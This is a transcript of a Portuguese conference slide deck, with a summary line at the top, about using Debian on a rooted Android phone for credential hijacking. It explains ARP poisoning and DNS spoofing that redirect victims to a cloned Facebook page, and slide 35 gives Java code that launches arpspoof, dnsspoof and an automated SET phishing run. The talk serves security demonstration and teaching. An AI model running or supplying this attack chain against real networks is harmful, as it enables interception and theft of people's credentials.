O documento discute a implementação de um ataque de sequestro de credenciais usando Debian com Android. Ele explica como configurar ferramentas como ARP Poisoning e DNS Spoofing para redirecionar o tráfego da vítima e roubar suas credenciais através de uma página falsa quando acessar sites como Facebook.

1. + =
Debian com Android Para Sequesto de
Credenciais
WILBERTO FILHO
Partec - Tangerina Lab
wilbertofilho@tangerinalab.com

2. Quem sou eu?

3. Quem eu não sou

4. Quem eu não sou

5. Quem eu sou

6. Quem eu sou

7. Credential Hijack

8. Credential Hijack
Credential Hijack Roubar senha

9. Objetivos

10. Objetivos (NÃO)
VOU ROUBAR A SENHA
DA MINHA NAMORADA!

11. Objetivos

12. Objetivos

13. Objetivos

14. O que precisava?
DNS SPOOFING

15. O que precisava?
Enfia o cabo que eu gosto!

16. Por que ARP Poisoning?

17. Porque ARP Poisoning?
10.0.0.1 ARP 00:00:5E:00:01:03

18. Porque ARP Poisoning?
10.0.0.5
Internet
10.0.0.3
10.0.0.1
192.168.1.1
10.0.0.2
10.0.0.4

19. Porque ARP Poisoning?
10.0.0.5
Internet
10.0.0.3
10.0.0.1
Quem é 10.0.0.1?
192.168.1.1
10.0.0.2
10.0.0.4

20. Porque ARP Poisoning?
10.0.0.5
EU!
Internet
10.0.0.3
10.0.0.1
Quem é 10.0.0.1?
192.168.1.1
10.0.0.2
10.0.0.4

21. Por que ARP Poisoning?

22. Porque DNS Spoofing?
Quero www.facebook.com!
OK!
DNS Request
- Servidor DNS
- Servidor HTTP
- Página Clonada

23. Porque placa em promiscous?
Quero www.google.com!
OK!
DNS Request
Internet ...

24. Primeira Tentativa

25. Primeira Tentativa
RESULTADO

26. Segunda tentativa

27. Por que Debian?
apt-get moo

28. Por que Debian?
1- debootstrap
2- dd
3- mke2fs
4- mount
5- chroot

29. Ferramentas
Busybox

30. Ferramentas
DSNIFF - ARPSPOOF

31. Ferramentas
DSNIFF - DNSSPOOF

32. Ferramentas

33. Ferramentas
SET

34. Usando o ataque

35. Usando o ataque
public void prepararAmbiente() throws IOException, InterruptedException {
Process p=Runtime.getRuntime().exec("su");
DataOutputStream stream=new DataOutputStream(p.getOutputStream());
stream.writeBytes("mount -o loop -t ext4 /sdcard/debian.img /data/local/debian");
stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c '/usr/bin/nohup
/usr/sbin/arpspoof -i wlan0 192.168.1.1&'");
stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c
'/usr/bin/nohup /usr/sbin/dnsspoof -i wlan0 -f /home/wilberto/spoof.txt&'");
stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c
'/home/wilberto/set/set-automate droidhawk.txt'");
stream.close();
p.destroy();
}

36. Resultado

37. Resultado

38. Obrigado!
João Paulo
Tiago Ferreira
Paula Cavalcanti
E a todos vocês pela atenção!